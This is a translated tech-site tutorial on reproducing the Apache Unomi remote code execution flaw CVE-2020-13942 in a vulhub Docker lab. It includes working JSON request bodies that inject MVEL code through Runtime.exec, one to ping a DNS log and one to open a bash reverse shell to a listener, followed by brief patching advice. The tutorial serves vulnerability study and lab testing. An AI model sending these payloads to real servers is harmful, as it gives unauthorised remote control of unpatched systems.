2025-02-24 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)05/31 Report--
Many people with little experience do not know how to reproduce the Apache Unomi remote code execution vulnerability CVE-2020-13942, so this article walks through the cause of the problem and the fix. After reading it, you should be able to reproduce the issue and understand how to address it.
0x00 Introduction
Apache Unomi is a standards-based customer data platform (CDP) for managing information about online customers and visitors in order to deliver personalized experiences that respect visitor privacy rules, such as GDPR and "do not track" preferences. It was originally developed by Jahia and submitted to the Apache Incubator in October 2015.
Apache Unomi provides privacy management, user/event/goal tracking, reporting, visitor profile management, segmentation, roles, A/B testing and more, and can be used as:
1. A personalization service for a web CMS
2. An analytics service for native mobile applications
3. A centralized profile management system with segmentation
4. An authorization management center
0x01 Vulnerability overview
In Apache Unomi versions before 1.5.1, an attacker could send a request containing a specially crafted MVEL or OGNL expression and cause the Unomi server to execute arbitrary code; that issue is CVE-2020-11975. CVE-2020-13942 is a bypass of the patch for CVE-2020-11975: the patch added a blacklist check on the expression, and an attacker can evade that blacklist, send a malicious request, and again execute arbitrary code on the server.
0x02 Affected versions
Apache Unomi < 1.5.2
0x03 Environment setup
1. This environment is built with the docker-based vulhub project, available at
https://github.com/vulhub/vulhub
2. Change into the CVE-2020-13942 directory under unomi in vulhub, which contains the environment for this vulnerability:
cd vulhub/unomi/CVE-2020-13942/
3. Start the vulnerable environment with the following command:
docker-compose up -d
4. A green "done" in the output indicates that startup succeeded. Open http://your-ip:8181 in the browser; if the Unomi page appears, the environment is ready.
0x04 Vulnerability reproduction
1. Open the home page of the target environment, capture the request with Burp, and send it to the Repeater module to construct the request.
2. Change the GET request to POST, delete the redundant headers, keeping only Host, User-Agent and Content-Length, then add the following body, replace DNSlog with your own dnslog address, and send it:
{"filters": [{"id": "boom", "filters": [{"condition": {"parameterValues": {"": "script::Runtime r = Runtime.getRuntime(); r.exec('ping DNSlog');"}, "type": "profilePropertyCondition"}]}], "sessionId": "boom"}
3. Refresh the dnslog site and check whether a DNS query has arrived; if it has, the expression was executed on the server.
4. The same vulnerability can be used to obtain a reverse shell: encode the bash reverse shell command using http://www.jackson-t.ca/runtime-exec-payloads.html.
5. Put the encoded command in place of "shell code" in the body below, start a listener on kali, and send the request:
{"filters": [{"id": "boom", "filters": [{"condition": {"parameterValues": {"": "script::Runtime r = Runtime.getRuntime(); r.exec(\"shell code\");"}, "type": "profilePropertyCondition"}]}], "sessionId": "boom"}
6. Check on kali that the shell connected back successfully.
0x05 Remediation recommendations
1. Avoid passing user-controlled data into an expression interpreter wherever possible.
2. The vendor has released a fixed version; download and update to the latest version as soon as possible.
After reading the above, have you mastered how to reproduce the Apache Unomi remote code execution vulnerability CVE-2020-13942? If you want to learn more or find out more about the topic, you are welcome to follow the industry information channel. Thank you for reading!